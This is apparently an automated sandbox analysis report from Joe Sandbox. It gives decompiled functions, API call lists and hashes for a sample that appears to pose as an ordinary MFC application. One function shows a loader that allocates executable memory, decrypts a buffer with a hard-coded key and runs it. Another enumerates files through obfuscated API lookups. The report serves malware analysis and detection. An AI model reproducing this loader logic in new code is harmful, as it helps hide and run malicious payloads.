Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: AddressLibraryLoadProc_malloc
String ID: A$A$ADVAPI32.DLL$C$CryptAcquireContextA$c$e$e$i$n$o$q$r$t$t$u$x
API String ID: 2391205483-810849556
Opcode ID: 33be6887776bb45f156c91100feadfee9feefed4932a3788c4d42c489fbfde11
Instruction ID: 83cb7c6687cd2237a667902df97d767b3d8751ad43d865d9c8d3f020bb7d5c88
Opcode Fuzzy Hash: 33be6887776bb45f156c91100feadfee9feefed4932a3788c4d42c489fbfde11
Instruction Fuzzy Hash: A521B6B0D44308EAEB10CFD0D8497DEBBB5BB04748F104119E5087A2D0D7FE6A588F94

Uniqueness

Uniqueness Score: -1.00%

Function 02241030, Relevance: 18.4, APIs: 12, Instructions: 362
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(02244054,02244040), ref: 02241047
GetProcAddress.KERNEL32(00000000), ref: 0224104E

Part of subcall function 02241B30: SetLastError.KERNEL32(0000000D,?,02241070,?,00000040), ref: 02241B3D

SetLastError.KERNEL32(000000C1), ref: 02241096

Memory Dump Source

Source File: 00000001.00000002.347463465.0000000002241000.00000020.00000001.sdmp, Offset: 02241000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2241000_NWMEaRqF7s.jbxd

Similarity

API ID: ErrorLast$AddressLibraryLoadProc
String ID:
API String ID: 1866314245-0
Opcode ID: 9f29b4545a87d577bf6f958e6fa2cf3ea53f28b8c310e4b8721525c519dd5adc
Instruction ID: 4860a13a9ea067abdc4836b8e06aed3e29d8dff52a7e10b05706b815c7dd6f6f
Opcode Fuzzy Hash: 9f29b4545a87d577bf6f958e6fa2cf3ea53f28b8c310e4b8721525c519dd5adc
Instruction Fuzzy Hash: 44F1C9B4E10209EFDB08CF94D984BADB7B1AF48304F208598E919AB345DB75EA91CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0040638F, Relevance: 16.6, APIs: 11, Instructions: 139
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E0040638F(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t54;
				void* _t58;
				signed int _t59;
				signed int _t63;
				signed short _t71;
				signed int _t84;
				void* _t94;
				struct HINSTANCE__* _t96;
				signed int _t97;
				void* _t98;
				signed int _t100;
				void* _t101;
				void* _t102;

				_t102 = __eflags;
				_t94 = __edx;
				_push(0x24);
				E0041F71D(E00431E39, __ebx, __edi, __esi);
				_t100 = __ecx;
				 *((intOrPtr*)(_t101 - 0x20)) = __ecx;
				 *(_t101 - 0x1c) =  *(__ecx + 0x60);
				 *(_t101 - 0x18) =  *(__ecx + 0x5c);
				_t54 = E0040DB94(__ebx, __edi, __ecx, _t102);
				_t96 =  *(_t54 + 0xc);
				_t84 = 0;
				_t103 =  *(_t100 + 0x58);
				if( *(_t100 + 0x58) != 0) {
					_t96 =  *(E0040DB94(0, _t96, _t100, _t103) + 0xc);
					_t54 = LoadResource(_t96, FindResourceA(_t96,  *(_t100 + 0x58), 5));
					 *(_t101 - 0x18) = _t54;
				}
				if( *(_t101 - 0x18) != _t84) {
					_t54 = LockResource( *(_t101 - 0x18));
					 *(_t101 - 0x1c) = _t54;
				}
				if( *(_t101 - 0x1c) != _t84) {
					_t86 = _t100;
					 *(_t101 - 0x14) = E00405EC7(_t84, _t100, __eflags);
					E00409D3F(_t84, _t96, __eflags);
					 *(_t101 - 0x28) =  *(_t101 - 0x28) & _t84;
					__eflags =  *(_t101 - 0x14) - _t84;
					 *(_t101 - 0x2c) = _t84;
					 *(_t101 - 0x24) = _t84;
					if(__eflags != 0) {
						__eflags =  *(_t101 - 0x14) - GetDesktopWindow();
						if(__eflags != 0) {
							__eflags = IsWindowEnabled( *(_t101 - 0x14));
							if(__eflags != 0) {
								EnableWindow( *(_t101 - 0x14), 0);
								 *(_t101 - 0x2c) = 1;
								_t84 = E00403ED6();
								__eflags = _t84;
								 *(_t101 - 0x24) = _t84;
								if(__eflags != 0) {
									_t86 = _t84;
									__eflags =  *((intOrPtr*)( *_t84 + 0x120))();
									if(__eflags != 0) {
										_t86 = _t84;
										__eflags = E0040CA70(_t84);
										if(__eflags != 0) {
											_t86 = _t84;
											E0040CA8B(_t84, 0);
											 *(_t101 - 0x28) = 1;
										}
									}
								}
							}
						}
					}
					 *(_t101 - 4) =  *(_t101 - 4) & 0x00000000;
					E0040B748(_t96, __eflags, _t100);
					_t58 = E00409C97(_t84, _t86, _t101,  *(_t101 - 0x14));
					_push(_t96);
					_push(_t58);
					_push( *(_t101 - 0x1c));
					_t59 = E0040619F(_t84, _t100, _t94, _t96, _t100, __eflags); // executed
					_t97 = 0;
					__eflags = _t59;
					if(_t59 != 0) {
						__eflags =  *(_t100 + 0x3c) & 0x00000010;
						if(( *(_t100 + 0x3c) & 0x00000010) != 0) {
							_t98 = 4;
							_t71 = E0040C981(_t100);
							__eflags = _t71 & 0x00000100;
							if((_t71 & 0x00000100) != 0) {
								_t98 = 5;
							}
							E0040982D(_t100, _t98);
							_t97 = 0;
							__eflags = 0;
						}
						__eflags =  *((intOrPtr*)(_t100 + 0x20)) - _t97;
						if( *((intOrPtr*)(_t100 + 0x20)) != _t97) {
							E0040CC5E(_t100, _t97, _t97, _t97, _t97, _t97, 0x97);
						}
					}
					 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
					__eflags =  *(_t101 - 0x28) - _t97;
					if( *(_t101 - 0x28) != _t97) {
						E0040CA8B(_t84, 1);
					}
					__eflags =  *(_t101 - 0x2c) - _t97;
					if( *(_t101 - 0x2c) != _t97) {
						EnableWindow( *(_t101 - 0x14), 1);
					}
					__eflags =  *(_t101 - 0x14) - _t97;
					if(__eflags != 0) {
						__eflags = GetActiveWindow() -  *((intOrPtr*)(_t100 + 0x20));
						if(__eflags == 0) {
							SetActiveWindow( *(_t101 - 0x14));
						}
					}
					 *((intOrPtr*)( *_t100 + 0x60))();
					E00405F01(_t84, _t100, _t97, _t100, __eflags);
					__eflags =  *(_t100 + 0x58) - _t97;
					if( *(_t100 + 0x58) != _t97) {
						FreeResource( *(_t101 - 0x18));
					}
					_t63 =  *(_t100 + 0x44);
					goto L31;
				} else {
					_t63 = _t54 | 0xffffffff;
					L31:
					return E0041F7C2(_t63);
				}
			}

0x0040638f
0x0040638f
0x0040638f
0x00406396
0x0040639b
0x0040639d
0x004063a3
0x004063a9
0x004063ac
0x004063b1
0x004063b4
0x004063b6
0x004063b9
0x004063c0
0x004063d1
0x004063d7
0x004063d7
0x004063dd
0x004063e2
0x004063e8
0x004063e8
0x004063ee
0x004063f8
0x004063ff
0x00406402
0x00406407
0x0040640a
0x0040640d
0x00406410
0x00406413
0x0040641b
0x0040641e
0x00406429
0x0040642b
0x00406432
0x00406438
0x00406444
0x00406446
0x00406448
0x0040644b
0x0040644f
0x00406457
0x00406459
0x0040645b
0x00406462
0x00406464
0x00406468
0x0040646a
0x0040646f
0x0040646f
0x00406464
0x00406459
0x0040644b
0x0040642b
0x0040641e
0x00406476
0x0040647b
0x00406483
0x00406488
0x00406489
0x0040648a
0x0040648f
0x00406494
0x00406496
0x00406498
0x0040649a
0x0040649e
0x004064a2
0x004064a5
0x004064aa
0x004064ae
0x004064b2
0x004064b2
0x004064b6
0x004064bb
0x004064bb
0x004064bb
0x004064bd
0x004064c0
0x004064ce
0x004064ce
0x004064c0
0x004064d3
0x004064f6
0x004064f9
0x004064ff
0x004064ff
0x00406504
0x00406507
0x0040650e
0x0040650e
0x00406514
0x00406517
0x0040651f
0x00406522
0x00406527
0x00406527
0x00406522
0x00406531
0x00406536
0x0040653b
0x0040653e
0x00406543
0x00406543
0x00406549
0x00000000
0x004063f0
0x004063f0
0x0040654c
0x00406551
0x00406551

APIs

__EH_prolog3_catch.LIBCMT ref: 00406396
FindResourceA.KERNEL32(?,?,00000005), ref: 004063C9
LoadResource.KERNEL32(?,00000000), ref: 004063D1
LockResource.KERNEL32(?,00000024,00401257,00000000,Local AppWizard-Generated Applications), ref: 004063E2
GetDesktopWindow.USER32 ref: 00406415
IsWindowEnabled.USER32(?), ref: 00406423
EnableWindow.USER32(?,00000000), ref: 00406432

Part of subcall function 0040CA70: IsWindowEnabled.USER32(?), ref: 0040CA79

Part of subcall function 0040CA8B: EnableWindow.USER32(?,?), ref: 0040CA98

EnableWindow.USER32(?,00000001), ref: 0040650E
GetActiveWindow.USER32 ref: 00406519
SetActiveWindow.USER32(?,?,00000024,00401257,00000000,Local AppWizard-Generated Applications), ref: 00406527
FreeResource.KERNEL32(?,?,00000024,00401257,00000000,Local AppWizard-Generated Applications), ref: 00406543

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchLoadLock
String ID:
API String ID: 1509511306-0
Opcode ID: bf87a749a78ca6df1642d3bac92c0d685b06468b383742aa02b2d1cc5a8d1e5f
Instruction ID: 8608bcd7ad7a3e8128c5f383c3e7d97f5d4ffa180cd5963f6d8b64b71c53f861
Opcode Fuzzy Hash: bf87a749a78ca6df1642d3bac92c0d685b06468b383742aa02b2d1cc5a8d1e5f
Instruction Fuzzy Hash: 1051AD30A00605DBCB21AFA5C985AAFBBB1BF84705F15413EE502B62D2CB785951CF6D

Uniqueness

Uniqueness Score: -1.00%

Function 00403F0B, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70
libraryCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00403F0B(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, int _a4) {
				signed int _v8;
				char _v284;
				char _v288;
				void* __esi;
				void* __ebp;
				signed int _t9;
				struct HINSTANCE__* _t12;
				intOrPtr* _t18;
				intOrPtr _t26;
				void* _t27;
				intOrPtr _t33;
				signed int _t34;
				intOrPtr _t35;
				signed int _t36;
				void* _t37;

				_t33 = __edi;
				_t32 = __edx;
				_t28 = __ecx;
				_t26 = __ebx;
				_t9 =  *0x443590; // 0xa920217c
				_v8 = _t9 ^ _t36;
				_t39 = _a4 - 0x800;
				_t35 = __ecx;
				if(_a4 != 0x800) {
					_t12 = GetLocaleInfoA(_a4, 3,  &_v288, 4); // executed
					__eflags = _t12;
					if(__eflags != 0) {
						goto L2;
					} else {
					}
				} else {
					_push(E0041FC1E(__edx,  &_v288, 4, "LOC"));
					E00402F17(__ebx, _t28, __edi, _t35);
					_t37 = _t37 + 0x10;
					L2:
					_push(_t26);
					_push(_t33);
					_t34 =  *(E0041F8D2(_t39));
					 *(E0041F8D2(_t39)) =  *_t14 & 0x00000000;
					_t35 = 0x112;
					_t27 = E0041FC9F( &_v284, 0x112, 0x111, 0x112,  &_v288);
					_t18 = E0041F8D2(_t39);
					_t40 =  *_t18;
					if( *_t18 == 0) {
						 *(E0041F8D2(__eflags)) = _t34;
					} else {
						E004031BC( *((intOrPtr*)(E0041F8D2(_t40))));
					}
					if(_t27 == 0xffffffff || _t27 >= _t35) {
						_t12 = 0;
						__eflags = 0;
					} else {
						_t12 = LoadLibraryA( &_v284); // executed
					}
					_pop(_t33);
					_pop(_t26);
				}
				return E0041E5DF(_t12, _t26, _v8 ^ _t36, _t32, _t33, _t35);
			}

0x00403f0b
0x00403f0b
0x00403f0b
0x00403f0b
0x00403f14
0x00403f1b
0x00403f1e
0x00403f26
0x00403f2e
0x00403f9c
0x00403fa2
0x00403fa4
0x00000000
0x00000000
0x00403fa6
0x00403f30
0x00403f3d
0x00403f3e
0x00403f43
0x00403f46
0x00403f46
0x00403f47
0x00403f4d
0x00403f54
0x00403f64
0x00403f79
0x00403f7b
0x00403f80
0x00403f83
0x00403fad
0x00403f85
0x00403f8c
0x00403f91
0x00403fb2
0x00403fc7
0x00403fc7
0x00403fb8
0x00403fbf
0x00403fbf
0x00403fc9
0x00403fca
0x00403fca
0x00403fd7

APIs

_strcpy_s.LIBCMT ref: 00403F38

Part of subcall function 00402F17: __CxxThrowException@8.LIBCMT ref: 004037F7
Part of subcall function 00402F17: __EH_prolog3.LIBCMT ref: 00403804

Part of subcall function 0041F8D2: __getptd_noexit.LIBCMT ref: 0041F8D2

__snprintf_s.LIBCMT ref: 00403F71

Part of subcall function 0041FC9F: __vsnprintf_s_l.LIBCMT ref: 0041FCB4

GetLocaleInfoA.KERNELBASE(00000800,00000003,?,00000004), ref: 00403F9C
LoadLibraryA.KERNELBASE(?), ref: 00403FBF

Strings

LOC, xrefs: 00403F30

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: Exception@8H_prolog3InfoLibraryLoadLocaleThrow__getptd_noexit__snprintf_s__vsnprintf_s_l_strcpy_s
String ID: LOC
API String ID: 4018564869-519433814
Opcode ID: 124329ac7b5173beeb4f80da07e0245dcef33f898aea0afbead4e6b8adcc6ca7
Instruction ID: a958a6fff790820a8ed6774035e13ca5e81909a58661fe9e0dffe607a1d70840
Opcode Fuzzy Hash: 124329ac7b5173beeb4f80da07e0245dcef33f898aea0afbead4e6b8adcc6ca7
Instruction Fuzzy Hash: D811A8719102086AD714BF61CC46BDE36BCAF01719F1000B7B504BB1D1EB7C9E9A8B99

Uniqueness

Uniqueness Score: -1.00%

Function 022528FB, Relevance: 4.6, APIs: 3, Instructions: 139
fileCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E022528FB(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				short _v524;
				char _v1044;
				short _v1588;
				short _v1590;
				struct _WIN32_FIND_DATAW _v1636;
				void* _v1640;
				void* _t21;
				void* _t22;
				int _t28;
				signed int _t31;
				signed int _t33;
				signed int _t35;
				void* _t47;
				void* _t48;
				void* _t50;
				void* _t75;
				void* _t78;
				void* _t79;

				_t75 = _v1640;
				_t48 = __edx;
				_t78 = __ecx;
				_t21 = 0xe3051c;
				while(1) {
					L1:
					_t50 = 0x2e;
					do {
						L2:
						while(_t21 != 0xe3051c) {
							if(_t21 == 0x57934ae) {
								_t22 = E02252674(0x2259190);
								_push(_t78);
								_t76 = _t22;
								_push(_t22);
								_push(0x104);
								_push( &_v524);
								 *((intOrPtr*)(E02252F84(0xa83808e5, 0xb436274a, 0x156)))();
								_t79 = _t79 + 0x10;
								E02252FDF(_t76);
								_t21 = 0x3a3f7db0;
								while(1) {
									L1:
									_t50 = 0x2e;
									goto L2;
								}
							}
							if(_t21 == 0xfc52714) {
								E02252F84(0xf568ce83, 0xdc33dcc3, 0x19d);
								_t28 = FindClose(_t75); // executed
								return _t28;
							}
							if(_t21 == 0x29ccb448) {
								E02252F84(0xf568ce83, 0xab7da153, 0x55);
								_t31 = FindNextFileW(_t75,  &_v1636); // executed
								asm("sbb eax, eax");
								_t33 =  ~_t31 & 0x1aaf748c;
								L19:
								_t21 = _t33 + 0xfc52714;
								while(1) {
									L1:
									_t50 = 0x2e;
									goto L2;
								}
							}
							if(_t21 == 0x2a749ba0) {
								if((_v1636.dwFileAttributes & 0x00000010) == 0) {
									_t35 = _a4( &_v1636, _a8);
									asm("sbb eax, eax");
									_t33 =  ~_t35 & 0x1a078d34;
									goto L19;
								}
								if(_v1636.cFileName != _t50 || _v1590 != 0 && (_v1590 != _t50 || _v1588 != 0)) {
									if(_t48 != 0) {
										_t77 = E02252674(0x22591c0);
										_push( &(_v1636.cFileName));
										_push(_t78);
										_push(0x104);
										_push( &_v1044);
										 *((intOrPtr*)(E02252F84(0xa83808e5, 0xb436274a, 0x156)))();
										_t79 = _t79 + 0x14;
										E022528FB( &_v1044, _t48, _a4, _a8);
										E02252FDF(_t77);
										_t50 = 0x2e;
									}
								}
								_t21 = 0x29ccb448;
								continue;
							}
							if(_t21 != 0x3a3f7db0) {
								goto L23;
							}
							E02252F84(0xf568ce83, 0x8da84b58, 0x158);
							_t47 = FindFirstFileW( &_v524,  &_v1636); // executed
							_t75 = _t47;
							if(_t75 == 0xffffffff) {
								return _t47;
							}
							_t21 = 0x2a749ba0;
							goto L1;
						}
						_t21 = 0x57934ae;
						L23:
					} while (_t21 != 0x3178f15b);
					return _t21;
				}
			}

0x02252905
0x02252909
0x0225290b
0x0225290d
0x02252912
0x02252912
0x02252914
0x02252915
0x00000000
0x02252915
0x02252925
0x02252a74
0x02252a79
0x02252a7a
0x02252a81
0x02252a82
0x02252a93
0x02252a9f
0x02252aa1
0x02252aa6
0x02252aab
0x02252912
0x02252912
0x02252914
0x00000000
0x02252914
0x02252912
0x02252930
0x02252ad7
0x02252add
0x00000000
0x02252add
0x0225293b
0x02252a5c
0x02252a62
0x02252a66
0x02252a68
0x02252a40
0x02252a40
0x02252912
0x02252912
0x02252914
0x00000000
0x02252914
0x02252912
0x02252946
0x0225298e
0x02252a30
0x02252a39
0x02252a3b
0x00000000
0x02252a3b
0x02252999
0x022529be
0x022529ca
0x022529da
0x022529db
0x022529dd
0x022529e9
0x022529f5
0x022529f7
0x02252a11
0x02252a1a
0x02252a21
0x02252a21
0x022529be
0x022529b2
0x00000000
0x022529b2
0x0225294d
0x00000000
0x00000000
0x0225296f
0x02252975
0x02252977
0x0225297c
0x02252ae9
0x02252ae9
0x02252982
0x00000000
0x02252982
0x02252ab5
0x02252aba
0x02252aba
0x00000000
0x02252915

APIs

FindFirstFileW.KERNELBASE(?,?), ref: 02252975
FindNextFileW.KERNELBASE(?,?), ref: 02252A62
FindClose.KERNELBASE(?), ref: 02252ADD

Memory Dump Source

Source File: 00000001.00000002.347505404.0000000002251000.00000020.00000001.sdmp, Offset: 02250000, based on PE: true

Associated: 00000001.00000002.347493243.0000000002250000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.347513236.0000000002259000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2250000_NWMEaRqF7s.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: fe819a75e12c512f8cec9328a153777351e873264154be275a71e7aec3d8dc12
Instruction ID: 6b957165d77b51acb338c83fa831de4c81644eb0420573eb58f59db7377d608a
Opcode Fuzzy Hash: fe819a75e12c512f8cec9328a153777351e873264154be275a71e7aec3d8dc12
Instruction Fuzzy Hash: 44414C31528322D6D638A5E49884B6B66E6CBD0324F24CB19FD50C73D8DF7AC9C4C6A3

Uniqueness

Uniqueness Score: -1.00%

Function 00401E30, Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 174
windowlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E00401E30(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				int _v8;
				char _v16;
				intOrPtr _v20;
				int _v24;
				char _v28;
				int _v32;
				_Unknown_base(*)()* _v36;
				_Unknown_base(*)()* _v40;
				intOrPtr _v44;
				long _v48;
				struct HINSTANCE__* _v52;
				void* _v56;
				intOrPtr _v72;
				intOrPtr _v100;
				CHAR* _v104;
				long _v112;
				long _v116;
				intOrPtr _v120;
				void* __ebp;
				signed int _t74;
				void* _t97;
				signed int _t152;
				void* _t158;
				intOrPtr _t161;

				_t158 = __eflags;
				_push(0xffffffff);
				_push(E00431B18);
				_push( *[fs:0x0]);
				_t74 =  *0x443590; // 0xa920217c
				_push(_t74 ^ _t152);
				 *[fs:0x0] =  &_v16;
				_v120 = __ecx;
				E00406041(__ebx, _v120, __edi);
				_push(GetSystemMenu( *(_v120 + 0x20), 0));
				_v20 = E0040DEED(__ebx,  *(_v120 + 0x20), __edi, __esi, _t158);
				if(_v20 != 0) {
					E00402890( &_v28);
					_v8 = 0;
					_push(0x68);
					_v72 = E0040DDFE();
					if(_v72 != 0) {
						E00402910( &_v28, _v72, 0x68);
					}
					_v100 =  *((intOrPtr*)(_v28 - 0xc));
					_t161 = _v100;
					_t162 = _t161 == 0x00000000 & 0x000000ff;
					if((_t161 == 0x00000000 & 0x000000ff) == 0) {
						AppendMenuA( *(_v20 + 4), 0x800, 0, 0);
						_v104 = _v28;
						AppendMenuA( *(_v20 + 4), 0, 0x10, _v104);
					}
					_v32 = 0;
					_v56 = 0;
					_v48 = 0;
					_v40 = 0;
					_t97 = E00401D20(_t162); // executed
					_t163 = _t97;
					if(_t97 == 0) {
						_v40 = GetProcAddress(0x400000, "UUACZDADWAJJJJJ");
					}
					_v52 = E00401A10(L"kernel32.dll");
					_v36 = GetProcAddress(_v52, "VirtualAlloc");
					_v32 = E00401A70(_t163, 0x3d9, 0x11c1, 0x409,  &_v48);
					if(_v32 != 0) {
						_v56 = VirtualAlloc(0, _v48, 0x3000, 0x40);
					}
					if(_v56 != 0) {
						_v40(_v32, _v48, "6Z6x8!4zpUCX@R#toJr^+TCgAUZ(Q%ylNN>>FTZD_XQd$eGdqe@v?1J48XWg!*)(O9tF@RENQV27J_nbjWhEt%U5@&RL(^C?NZe>&SRx1xAVYzU6ZpO^Q", 0x76, _v56);
					}
					_v24 = _v56;
					_v44 = _v24();
					_v8 = 0xffffffff;
					E00401320( &_v28);
				}
				_v112 =  *((intOrPtr*)(_v120 + 0x74));
				SendMessageA( *(_v120 + 0x20), 0x80, 1, _v112);
				_v116 =  *((intOrPtr*)(_v120 + 0x74));
				SendMessageA( *(_v120 + 0x20), 0x80, 0, _v116);
				if( *((intOrPtr*)(_v120 + 0x120)) == 0) {
					__eflags = _v120 + 0x78;
					E0040CA8B(_v120 + 0x78, 0);
				} else {
					E0040CA8B(_v120 + 0x78, 1);
				}
				if( *((intOrPtr*)(_v120 + 0x130)) == 0) {
					__eflags = _v120 + 0xcc;
					E0040CA8B(_v120 + 0xcc, 0);
				} else {
					E0040CA8B(_v120 + 0xcc, 1);
				}
				 *[fs:0x0] = _v16;
				return 1;
			}

0x00401e30
0x00401e33
0x00401e35
0x00401e40
0x00401e44
0x00401e4b
0x00401e4f
0x00401e55
0x00401e5b
0x00401e6f
0x00401e75
0x00401e7c
0x00401e85
0x00401e8a
0x00401e91
0x00401e98
0x00401e9f
0x00401eac
0x00401eac
0x00401eb7
0x00401ebc
0x00401ec6
0x00401ec8
0x00401eda
0x00401ee3
0x00401ef5
0x00401ef5
0x00401efb
0x00401f02
0x00401f09
0x00401f10
0x00401f17
0x00401f1c
0x00401f1e
0x00401f30
0x00401f30
0x00401f40
0x00401f52
0x00401f70
0x00401f77
0x00401f89
0x00401f89
0x00401f90
0x00401fa5
0x00401fa8
0x00401fae
0x00401fb4
0x00401fb7
0x00401fc1
0x00401fc1
0x00401fcc
0x00401fe1
0x00401fed
0x00402002
0x00402012
0x00402028
0x0040202b
0x00402014
0x0040201c
0x0040201c
0x0040203a
0x00402053
0x00402059
0x0040203c
0x00402047
0x00402047
0x00402066
0x00402071

APIs

GetSystemMenu.USER32(?,00000000,A920217C), ref: 00401E69
AppendMenuA.USER32 ref: 00401EDA
AppendMenuA.USER32 ref: 00401EF5
GetProcAddress.KERNEL32(00400000,UUACZDADWAJJJJJ), ref: 00401F2A
GetProcAddress.KERNEL32(?,VirtualAlloc), ref: 00401F4C
VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 00401F86
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 00401FE1
SendMessageA.USER32(?,00000080,00000000,?), ref: 00402002

Strings

UUACZDADWAJJJJJ, xrefs: 00401F20
6Z6x8!4zpUCX@R#toJr^+TCgAUZ(Q%ylNN>>FTZD_XQd$eGdqe@v?1J48XWg!*)(O9tF@RENQV27J_nbjWhEt%U5@&RL(^C?NZe>&SRx1xAVYzU6ZpO^Q, xrefs: 00401F98
VirtualAlloc, xrefs: 00401F43
kernel32.dll, xrefs: 00401F33

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: Menu$AddressAppendMessageProcSend$AllocSystemVirtual
String ID: 6Z6x8!4zpUCX@R#toJr^+TCgAUZ(Q%ylNN>>FTZD_XQd$eGdqe@v?1J48XWg!*)(O9tF@RENQV27J_nbjWhEt%U5@&RL(^C?NZe>&SRx1xAVYzU6ZpO^Q$UUACZDADWAJJJJJ$VirtualAlloc$kernel32.dll
API String ID: 788825803-1877897661
Opcode ID: 0c317e2cec8b35522e85a97d8f9b33161106303d3713bb799065d46ae679c45d
Instruction ID: ff84c4e7adf23d41df9a6f65582e714f74d1400c784c60132990823294043f06
Opcode Fuzzy Hash: 0c317e2cec8b35522e85a97d8f9b33161106303d3713bb799065d46ae679c45d
Instruction Fuzzy Hash: 3B711AB4E40208EBDB14DBA5C955BAEB7B5BF48704F20422EF5017B2D1D7796901CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0041AB2A, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 122
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 62%

			E0041AB2A(void* __ecx, void* __edx, void* __eflags, char _a132, char _a392, signed int _a652, char _a656) {
				char _v124;
				char* _v128;
				char _v660;
				char _v804;
				char _v812;
				char _v820;
				intOrPtr _v832;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t44;
				char* _t53;
				char* _t57;
				void* _t59;
				intOrPtr _t73;
				void* _t76;
				char* _t79;
				char* _t81;
				char* _t84;
				void* _t87;
				void* _t89;
				void* _t90;
				intOrPtr _t93;
				void* _t94;
				void* _t95;
				void* _t96;
				void* _t97;
				void* _t99;
				void* _t100;
				signed int _t102;
				void* _t105;
				void* _t106;
				void* _t108;
				void* _t109;

				_t94 = __edx;
				_t90 = __ecx;
				_t102 =  &_v660;
				_t109 = _t108 - 0x310;
				_t44 =  *0x443590; // 0xa920217c
				_a652 = _t44 ^ _t102;
				_push(_t87);
				_push(_t95);
				_t99 = __ecx;
				_t96 = E0040DB94(_t87, _t95, __ecx, __eflags);
				 *(_t96 + 8) =  *(_t99 + 0x44);
				 *(_t96 + 0xc) =  *(_t99 + 0x44);
				if(GetModuleFileNameA( *(_t99 + 0x44),  &_a392, 0x104) == 0) {
					L7:
					E0040E0F0(_t90);
				} else {
					__eflags = __eax - 0x104;
					if(__eax == 0x104) {
						goto L7;
					}
				}
				_t53 = PathFindExtensionA( &_a392); // executed
				__eflags = _t53;
				_v128 = _t53;
				if(_t53 == 0) {
					E0040E0F0(_t90);
				}
				 *_v128 = 0;
				_t57 = E0041AAEC( &_a392,  &_a132, 0x104);
				__eflags = _t57;
				if(_t57 != 0) {
					E0040E0F0(_t90);
				}
				__eflags =  *(_t99 + 0x60);
				if( *(_t99 + 0x60) != 0) {
					L15:
					_t58 =  *(_t99 + 0x50);
					__eflags = _t58;
					if(_t58 != 0) {
						L20:
						 *(_t96 + 0x10) = _t58;
						__eflags =  *(_t99 + 0x64);
						if( *(_t99 + 0x64) != 0) {
							L26:
							__eflags =  *(_t99 + 0x68);
							if( *(_t99 + 0x68) != 0) {
								L28:
								_pop(_t97);
								_pop(_t100);
								_pop(_t89);
								_t59 = E0041E5DF(_t58, _t89, _a652 ^ _t102, _t94, _t97, _t100);
								__eflags =  &_a656;
								return _t59;
							} else {
								_push(E00421A5D(_t94,  &_a132, 0x104, ".INI"));
								E00402F17(0x104, _t90, _t96, _t99);
								_t58 = E0041FD45( &_a132);
								_t109 = _t109 + 0x14;
								__eflags = _t58;
								 *(_t99 + 0x68) = _t58;
								if(_t58 == 0) {
									goto L14;
								} else {
									goto L28;
								}
							}
						} else {
							_t76 =  &_a652 - _v128;
							__eflags =  *((intOrPtr*)(_t99 + 0x6c)) - 1;
							if( *((intOrPtr*)(_t99 + 0x6c)) != 1) {
								_push(".HLP");
							} else {
								_push(".CHM");
							}
							_push(_t76);
							_push(_v128);
							E00403EBB(0x104, _t94, _t96, _t99, _t102);
							_t109 = _t109 + 0xc;
							_t79 = E0041FD45( &_a392);
							__eflags = _t79;
							_pop(_t90);
							 *(_t99 + 0x64) = _t79;
							if(_t79 == 0) {
								goto L14;
							} else {
								_t58 = _v128;
